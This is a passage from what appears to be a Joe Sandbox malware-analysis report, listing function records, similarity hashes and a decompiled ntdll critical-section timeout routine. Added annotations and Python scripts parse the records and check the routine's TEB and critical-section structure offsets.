                                                                      • Opcode Fuzzy Hash: 9bf9d988ef331c32cfe43a6043211565ffbba1b8c14a5f08a1cda502973c434f
                                                                      • Instruction Fuzzy Hash: 57B09B729015D5C5D711D76046087177900B7D0751F76C095D2060641A4778C095F5B5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
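The function records above all follow one fixed layout (APIs, Strings, Memory Dump Source, Yara matches, Similarity, Uniqueness), which makes them easy to turn into structured data for pivoting: which imports the dumped code resolved, which dump each function came from, and which Opcode IDs can be searched for in other samples' reports. The parser below is an added example written for this page, not part of the Joe Sandbox report or tooling; its sample input is two records copied in the shape of the blocks above, and the field names it keys on are exactly the ones the report prints.

```python
"""Parse Joe Sandbox per-function records (APIs / Memory Dump Source / Similarity /
Uniqueness blocks) into dicts so they can be filtered and pivoted on.
Added example for this page; not part of the sandbox report."""
import re
from collections import Counter

# Constructed sample: two records in the shape of the blocks on this page.
SAMPLE = """\
APIs
• Sleep.KERNELBASE(000007D0), ref: 00126F78
Strings
Memory Dump Source
• Source File: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
Yara matches
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
• Opcode ID: 2bd0cf6b713eb471d7167dbc98f1b1573f721bb1252b511e462bcee841536980
• Instruction ID: 67880e136812acb038e59fb035610420e6b2273de8189b9f66bf7633162d7ccc
• Opcode Fuzzy Hash: 2bd0cf6b713eb471d7167dbc98f1b1573f721bb1252b511e462bcee841536980
• Instruction Fuzzy Hash: DD319EB1601704ABC715DFA8E9A1FA7B7B8AF98700F00841DF61A9B281D730B955CBA0
Uniqueness

Uniqueness Score: -1.00%

APIs
• PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 001172BA
• PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 001172DB
Memory Dump Source
• Source File: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
• Opcode ID: 0d48ae8107cc51bb9b2dcdcdaff36038a9ecf63072080ee29a96342c7ecb6ba6
• Instruction ID: ca32957d3814886ddb4bb717d5d28e4f9ed62546bdbd24cce8c68c15a5063b90
• Opcode Fuzzy Hash: 0d48ae8107cc51bb9b2dcdcdaff36038a9ecf63072080ee29a96342c7ecb6ba6
• Instruction Fuzzy Hash: 1101DB31A8022877EB24A6949C03FFE776C5F10B50F550125FF04BA1C2E7A4690647F5
Uniqueness

Uniqueness Score: -1.00%
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Yara matches", "Similarity", "Uniqueness"}
# "Api.MODULE(arg,arg,...), ref: ADDR" as printed under APIs
API_CALL = re.compile(r"^(?P<api>\w+)\.(?P<module>[\w.]+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
SOURCE_FILE = re.compile(r"^Source File: (?P<dump>\S+), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$")


def parse_blocks(text):
    """Return one dict per record; a record opens at 'APIs' and closes at 'Uniqueness Score'."""
    blocks, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            cur = {"apis": [], "strings": [], "source": None, "associated": [], "fields": {}, "score": None}
            blocks.append(cur)
            section = "APIs"
            continue
        if cur is None:
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if line.startswith("Uniqueness Score:"):
            cur["score"] = float(line.split(":", 1)[1].strip().rstrip("%"))
            cur, section = None, None
            continue
        if not line.startswith("•"):
            continue
        item = line[1:].strip()
        if section == "APIs":
            entry = {"raw": item}            # keep unparsed symbols (e.g. CRT decorated names)
            m = API_CALL.match(item)
            if m:
                entry.update(api=m["api"], module=m["module"],
                             args=m["args"].split(",") if m["args"] else [],
                             ref=int(m["ref"], 16))
            cur["apis"].append(entry)
        elif section == "Strings":
            cur["strings"].append(item)
        elif section == "Memory Dump Source":
            m = SOURCE_FILE.match(item)
            if m:
                cur["source"] = {"dump": m["dump"], "offset": int(m["offset"], 16),
                                 "pe_backed": m["pe"] == "true"}
            elif item.startswith("Associated:"):
                cur["associated"].append(item.split(":", 1)[1].strip())
        elif section == "Similarity" and ":" in item:
            key, value = item.split(":", 1)
            cur["fields"][key.strip()] = value.strip()
    return blocks


def string_ids(block):
    """'String ID' is a '$'-joined list; split it, returning [] when the field is empty."""
    value = block["fields"].get("String ID", "")
    return value.split("$") if value else []


def api_usage(blocks):
    """Count (api, module) pairs across records: the imports the dumped code resolved."""
    return Counter((e["api"], e["module"]) for b in blocks for e in b["apis"] if "api" in e)


def by_opcode_id(blocks):
    """Index records by Opcode ID so the same function can be looked up in other reports."""
    index = {}
    for b in blocks:
        oid = b["fields"].get("Opcode ID")
        if oid:
            index.setdefault(oid, []).append(b)
    return index


if __name__ == "__main__":
    for b in parse_blocks(SAMPLE):
        print(b["fields"].get("API ID"), string_ids(b), [e.get("api") for e in b["apis"]], b["score"])
```

Records whose Uniqueness Score is -1.00 (as all of the ones above are) can be filtered out before pivoting, since the score was not computed for them; the `pe_backed` flag separates functions that came from a PE-backed image (the 02AB0000 dump) from those in the unbacked region at 00110000.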

                                                                      Non-executed Functions

                                                                      C-Code - Quality: 53%
                                                                      			/* Editor's annotation, not part of the sandbox output: the two format strings are ntdll's
                                                                      			   RTL critical-section timeout diagnostics, so the raw offsets below are read against the
                                                                      			   x86 TEB, RTL_CRITICAL_SECTION and RTL_CRITICAL_SECTION_DEBUG layouts. */
                                                                      			E02B6FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                      				void* _t7;
                                                                      				intOrPtr _t9;
                                                                      				intOrPtr _t10;
                                                                      				intOrPtr* _t12;
                                                                      				intOrPtr* _t13;
                                                                      				intOrPtr _t14;
                                                                      				intOrPtr* _t15;
                                                                      
                                                                      				_t13 = __edx;                                 /* __edx -> 64-bit timeout (low dword, high dword) */
                                                                      				_push(_a4);
                                                                      				_t14 =  *[fs:0x18];                           /* fs:[0x18] = TEB.NtTib.Self, i.e. the TEB pointer */
                                                                      				_t15 = _t12;                                  /* register argument left unnamed by the decompiler: RTL_CRITICAL_SECTION* */
                                                                      				_t7 = E02B1CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                      				                                              /* 0xffffffffff676980 = -10,000,000 = one second in 100-ns NT time units;
                                                                      				                                                 likely a 64-bit divide turning the timeout into the "%I64u secs" value */
                                                                      				_push(_t13);
                                                                      				E02B65720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);   /* DbgPrintEx-style (component, level, format, ...) */
                                                                      				_t9 =  *_t15;                                 /* RTL_CRITICAL_SECTION.DebugInfo (+0) */
                                                                      				if(_t9 == 0xffffffff) {                       /* -1 is treated as "no debug info attached" */
                                                                      					_t10 = 0;
                                                                      				} else {
                                                                      					_t10 =  *((intOrPtr*)(_t9 + 0x14));   /* RTL_CRITICAL_SECTION_DEBUG.ContentionCount (+0x14) */
                                                                      				}
                                                                      				_push(_t10);
                                                                      				_push(_t15);
                                                                      				_push( *((intOrPtr*)(_t15 + 0xc)));           /* RTL_CRITICAL_SECTION.OwningThread (+0xc) */
                                                                      				_push( *((intOrPtr*)(_t14 + 0x24)));          /* TEB.ClientId.UniqueThread (+0x24) */
                                                                      				return E02B65720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));   /* TEB.ClientId.UniqueProcess (+0x20) */
                                                                      			}
                                                                      
                                                                      Statement addresses (decompiler side column, one per statement above): 0x02b6fdda 0x02b6fde2 0x02b6fde5 0x02b6fdec 0x02b6fdfa 0x02b6fdff 0x02b6fe0a 0x02b6fe0f 0x02b6fe17 0x02b6fe1e 0x02b6fe19 0x02b6fe19 0x02b6fe19 0x02b6fe20 0x02b6fe21 0x02b6fe22 0x02b6fe25 0x02b6fe40

                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02B6FDFA
                                                                      Strings
                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02B6FE01
                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02B6FE2B
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.595869382.0000000002AB0000.00000040.00000001.sdmp, Offset: 02AB0000, based on PE: true
                                                                      • Associated: 00000017.00000002.596984017.0000000002BCB000.00000040.00000001.sdmp
                                                                      • Associated: 00000017.00000002.597020063.0000000002BCF000.00000040.00000001.sdmp
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                      • API String ID: 885266447-3903918235
                                                                      • Opcode ID: c005addcb5df5cb9589c7e0e1a19739b188d7671ab1f741599b42c3e09edb650
                                                                      • Instruction ID: 876c1a94babdff9a5ba767490173dcadf22410672c98ae85a1d8b7bf3067295f
                                                                      • Opcode Fuzzy Hash: c005addcb5df5cb9589c7e0e1a19739b188d7671ab1f741599b42c3e09edb650
                                                                      • Instruction Fuzzy Hash: 16F0C232240601BBE6301A95DC06F33BF5AEB44730F240255F628565D1DA62B83087A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
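The decompiled E02B6FDDA listing dereferences bare offsets (fs:[0x18], +0x20, +0x24, +0xc, +0x14) and passes the constant pair 0xff676980/0xffffffff. Before trusting a reading of such a function it is worth checking the offsets against the published 32-bit structure layouts rather than from memory. The script below is an added example for this page (not sandbox output and not Microsoft code): it models the x86 TEB prefix, RTL_CRITICAL_SECTION and RTL_CRITICAL_SECTION_DEBUG with 4-byte pointer fields so the offsets come out as on x86 whatever the host is, resolves each access in the listing to a field, and decodes the 64-bit constant as NT relative time. That E02B1CE00 is a division and E02B65720 a DbgPrintEx-style printer is an assumption of the lead-in, not something the script verifies.

```python
"""Cross-check the raw offsets in the decompiled E02B6FDDA listing against the x86
TEB / RTL_CRITICAL_SECTION / RTL_CRITICAL_SECTION_DEBUG layouts, and decode the
64-bit constant it passes. Added example for this page; runs on any host via ctypes."""
import ctypes
from fractions import Fraction

PTR32 = ctypes.c_uint32          # 4-byte pointers: x86 layout regardless of host width


class NT_TIB32(ctypes.Structure):
    _fields_ = [("ExceptionList", PTR32), ("StackBase", PTR32), ("StackLimit", PTR32),
                ("SubSystemTib", PTR32), ("FiberData", PTR32),
                ("ArbitraryUserPointer", PTR32), ("Self", PTR32)]


class CLIENT_ID32(ctypes.Structure):
    _fields_ = [("UniqueProcess", PTR32), ("UniqueThread", PTR32)]


class TEB32_HEAD(ctypes.Structure):
    # only the prefix the listing touches (NtTib, EnvironmentPointer, ClientId)
    _fields_ = [("NtTib", NT_TIB32), ("EnvironmentPointer", PTR32), ("ClientId", CLIENT_ID32)]


class RTL_CRITICAL_SECTION32(ctypes.Structure):
    _fields_ = [("DebugInfo", PTR32), ("LockCount", ctypes.c_int32),
                ("RecursionCount", ctypes.c_int32), ("OwningThread", PTR32),
                ("LockSemaphore", PTR32), ("SpinCount", ctypes.c_uint32)]


class LIST_ENTRY32(ctypes.Structure):
    _fields_ = [("Flink", PTR32), ("Blink", PTR32)]


class RTL_CRITICAL_SECTION_DEBUG32(ctypes.Structure):
    _fields_ = [("Type", ctypes.c_uint16), ("CreatorBackTraceIndex", ctypes.c_uint16),
                ("CriticalSection", PTR32), ("ProcessLocksList", LIST_ENTRY32),
                ("EntryCount", ctypes.c_uint32), ("ContentionCount", ctypes.c_uint32),
                ("Flags", ctypes.c_uint32), ("CreatorBackTraceIndexHigh", ctypes.c_uint16),
                ("SpareWORD", ctypes.c_uint16)]

NO_DEBUG_INFO = 0xffffffff        # the sentinel the listing compares DebugInfo against


def field_offset(struct, *path):
    """Byte offset of a possibly nested field, e.g. field_offset(TEB32_HEAD, 'ClientId', 'UniqueThread')."""
    offset = 0
    for name in path:
        offset += getattr(struct, name).offset
        struct = dict(struct._fields_)[name]
    return offset


def resolve_listing():
    """Map each raw access in the decompiled listing to (field name, computed offset)."""
    return {
        "fs:[0x18]":   ("TEB.NtTib.Self", field_offset(TEB32_HEAD, "NtTib", "Self")),
        "_t14 + 0x20": ("TEB.ClientId.UniqueProcess", field_offset(TEB32_HEAD, "ClientId", "UniqueProcess")),
        "_t14 + 0x24": ("TEB.ClientId.UniqueThread", field_offset(TEB32_HEAD, "ClientId", "UniqueThread")),
        "*_t15":       ("RTL_CRITICAL_SECTION.DebugInfo", field_offset(RTL_CRITICAL_SECTION32, "DebugInfo")),
        "_t15 + 0xc":  ("RTL_CRITICAL_SECTION.OwningThread", field_offset(RTL_CRITICAL_SECTION32, "OwningThread")),
        "_t9 + 0x14":  ("RTL_CRITICAL_SECTION_DEBUG.ContentionCount",
                        field_offset(RTL_CRITICAL_SECTION_DEBUG32, "ContentionCount")),
    }


def nt_relative_time(low, high):
    """Reassemble a (low dword, high dword) pair into a signed 64-bit NT time and return
    seconds as an exact Fraction (100-ns units; negative values are relative intervals)."""
    raw = (high << 32) | low
    signed = raw - (1 << 64) if raw & (1 << 63) else raw
    return Fraction(signed, 10_000_000)


def contention_count(debug_info_ptr, read_u32):
    """Mirror of the listing's branch: 0 when DebugInfo is the -1 sentinel, else
    the ContentionCount read through read_u32(address)."""
    if debug_info_ptr == NO_DEBUG_INFO:
        return 0
    return read_u32(debug_info_ptr + field_offset(RTL_CRITICAL_SECTION_DEBUG32, "ContentionCount"))


if __name__ == "__main__":
    for access, (field, off) in resolve_listing().items():
        print(f"{access:12} -> {field} (+{off:#x})")
    print("timeout constant:", nt_relative_time(0xff676980, 0xffffffff), "s")
```

Every offset in the listing resolves to a real field, and the constant pair is -10,000,000 units, i.e. a one-second relative interval, which is consistent with the "%I64u secs" in the first format string.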